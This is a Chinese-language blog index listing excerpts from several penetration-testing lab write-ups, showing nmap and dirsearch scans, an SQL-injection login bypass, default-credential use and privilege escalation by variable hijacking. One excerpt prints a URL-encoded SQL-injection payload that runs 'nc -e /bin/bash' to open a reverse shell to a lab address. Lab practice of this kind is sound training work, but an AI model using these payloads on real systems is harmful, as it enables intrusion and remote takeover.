摘要: 点击查看代码 nmap -p- -A 192.168.167.174 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 00:09 UTC Nmap scan report for 192.168.167.174 Host is up 阅读全文
posted @ 2024-11-12 15:57 WSssSW 阅读(9) 评论(0) 推荐(0) 编辑
摘要: nmap 发现两个 web站 80 和 9090 还有 22端口 dirsearch 发现80端口有login.php 登录界面 发现没有弱口令 测试sql注入 测试了一会发现密码 password=' # 就绕过了 不过我没搞懂为啥就绕过了 要后面拿了root权限才知道 登录之后发现密码 jame 阅读全文
posted @ 2024-11-12 15:56 WSssSW 阅读(1) 评论(0) 推荐(0) 编辑
摘要: nmap 扫 到 80 22 dirsearch 扫描发现 ┌──(root㉿kali)-[~] └─# dirsearch -u http://192.168.167.13/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: Dep 阅读全文
posted @ 2024-11-11 15:02 WSssSW 阅读(3) 评论(0) 推荐(0) 编辑
摘要: 靶场很简单分数只有10分跟平常做的20分的中级靶场比确实简单 我拿来放松的 算下来30分钟解决战斗 nmap 扫到80端口web界面 是个框架 搜exp https://www.exploit-db.com/exploits/52023 他的脚本可能有点问题看不到回显 我们审脚本直接看到漏洞点所在 阅读全文
posted @ 2024-11-10 13:30 WSssSW 阅读(3) 评论(0) 推荐(0) 编辑
摘要: 80端口web站点 dirsearch 没发现啥有用信息 感觉就是让我们突破登录框进后台的 https://github.com/ChurchCRM/CRM/issues/137 上网查到默认密码 登录后台 跟具cms查exp发现有个SQL注入 payload找半天找到一个 可以直接sql注入 ht 阅读全文
posted @ 2024-11-09 23:49 WSssSW 阅读(3) 评论(0) 推荐(0) 编辑
摘要: nmap + dirsearch 发现web站点 扫目录 ┌──(root㉿kali)-[/home/ftpuserr] └─# nmap -p- -A 192.168.167.39 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 0 阅读全文
posted @ 2024-11-09 20:37 WSssSW 阅读(3) 评论(0) 推荐(0) 编辑
摘要: nmap扫描 ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.167.234 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 03:59 UTC Stats: 0:01:22 elapsed; 0 阅读全文
posted @ 2024-11-09 14:53 WSssSW 阅读(1) 评论(0) 推荐(0) 编辑
摘要: 源码泄露 可以直接看到源码存在sql注入 反弹shellpayload http://192.168.167.162/phpinfo%22%20%20union%20select%20'system(%22nc%20-e%20/bin/bash%20192.168.45.250%2080%22);e 阅读全文
posted @ 2024-11-07 20:28 WSssSW 阅读(4) 评论(0) 推荐(0) 编辑
摘要: https://blog.csdn.net/m0_68636078/article/details/142436377 阅读全文
posted @ 2024-10-01 11:47 WSssSW 阅读(6) 评论(0) 推荐(0) 编辑
摘要: 在这个目录下有个./uid的程序 分别运行./uid 和 id 发现我们在 uid一行是有不一样的 我们猜测 在./uid里面他先用chown把我们的 uid改写成了anthea 然后运行id 然后再把我们的uid改回andromeda 那么我们怎么拿到这个anthea的权限呢 这里就需要用到变量劫 阅读全文
posted @ 2024-09-18 16:08 WSssSW 阅读(4) 评论(0) 推荐(0) 编辑